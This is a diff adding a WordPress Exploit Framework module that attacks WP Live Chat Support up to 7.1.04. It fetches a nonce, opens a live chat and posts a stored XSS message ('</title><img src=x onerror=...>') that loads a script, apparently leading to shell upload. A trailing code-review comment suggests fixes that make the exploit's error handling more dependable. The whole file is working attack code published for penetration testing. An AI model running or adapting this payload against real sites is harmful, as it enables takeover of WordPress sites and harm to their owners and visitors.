| 1 | +class Wpxf::Exploit::WpLiveChatSupportStoredXssShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::StoredXss |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'WP Live Chat Support <= 7.1.04 Stored XSS Shell Upload', |
| 9 | + author: [ |
| 10 | + 'Omaid Faizyar', # Disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['WPVDB', '8880'], |
| 15 | + ['URL', 'https://github.com/CodeCabin/wp-live-chat-support/issues/358'] |
| 16 | + ], |
| 17 | + date: 'Jul 20 2017' |
| 18 | + ) |
| 19 | + |
| 20 | + register_options([ |
| 21 | + StringOption.new( |
| 22 | + name: 'chat_name', |
| 23 | + desc: 'The name to use in the live chat', |
| 24 | + required: true |
| 25 | + ), |
| 26 | + StringOption.new( |
| 27 | + name: 'chat_email', |
| 28 | + desc: 'The e-mail address to use in the live chat', |
| 29 | + required: true |
| 30 | + ) |
| 31 | + ]) |
| 32 | + end |
| 33 | + |
| 34 | + def check |
| 35 | + check_plugin_version_from_changelog('wp-live-chat-support', 'readme.txt', '7.1.05') |
| 36 | + end |
| 37 | + |
| 38 | + def vulnerable_page |
| 39 | + 'the live chat window' |
| 40 | + end |
| 41 | + |
| 42 | + def find_nonce |
| 43 | + res = execute_get_request(url: full_uri) |
| 44 | + return nil unless res && res.code == 200 |
| 45 | + |
| 46 | + res.body.match(/wplc_nonce\s=\s"(.+?)";/)[1] |
| 47 | + end |
| 48 | + |
| 49 | + def initiate_chat(nonce) |
| 50 | + res = execute_post_request( |
| 51 | + url: wordpress_url_admin_ajax, |
| 52 | + body: { |
| 53 | + 'action' => 'wplc_start_chat', |
| 54 | + 'security' => nonce, |
| 55 | + 'name' => datastore['chat_name'], |
| 56 | + 'email' => datastore['chat_email'] |
| 57 | + } |
| 58 | + ) |
| 59 | + |
| 60 | + return nil unless res && res.code == 200 |
| 61 | + res.body.strip.to_i |
| 62 | + end |
| 63 | + |
| 64 | + def before_store |
| 65 | + emit_info 'Acquiring a security token...' |
| 66 | + self.nonce = find_nonce |
| 67 | + |
| 68 | + if nonce.nil? |
| 69 | + emit_error 'Failed to acquire a nonce' |
| 70 | + return false |
| 71 | + end |
| 72 | + |
| 73 | + emit_info 'Initiating a new live chat...' |
| 74 | + self.chat_id = initiate_chat(nonce) |
| 75 | + if chat_id.nil? |
| 76 | + emit_error 'Failed to start a live chat' |
| 77 | + return false |
| 78 | + end |
| 79 | + |
| 80 | + true |
| 81 | + end |
| 82 | + |
| 83 | + def store_script |
| 84 | + execute_post_request( |
| 85 | + url: wordpress_url_admin_ajax, |
| 86 | + body: { |
| 87 | + 'action' => 'wplc_user_send_msg', |
| 88 | + 'security' => nonce, |
| 89 | + 'cid' => chat_id, |
| 90 | + 'msg' => "#{Utility::Text.rand_alpha(1)}</title><img src=x onerror=#{xss_ascii_encoded_include_script}>" |
| 91 | + } |
| 92 | + ) |
| 93 | + end |
| 94 | + |
| 95 | + attr_accessor :nonce |
| 96 | + attr_accessor :chat_id |
| 97 | +end |
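Review bot: `find_nonce` (gutter line 46) indexes the result of `match` directly, so a 200 page that does not contain the `wplc_nonce` assignment raises NoMethodError instead of returning nil, which is the failure `before_store` tests for at line 68; `res.body[/wplc_nonce\s=\s"(.+?)";/, 1]` returns nil on no match and keeps that contract. `initiate_chat` (line 61) has the mirror problem: `to_i` maps any non-numeric body, including the `0` reply that admin-ajax typically returns for a rejected request, to 0, so `chat_id.nil?` at line 75 never fires and `store_script` goes on to post with `cid` 0; replacing the last line with `id = res.body.strip` and `id =~ /\A[1-9]\d*\z/ ? id.to_i : nil` makes a non-numeric or zero id a reported failure. Both helpers are fully within the hunk and neither change touches the rest of the class.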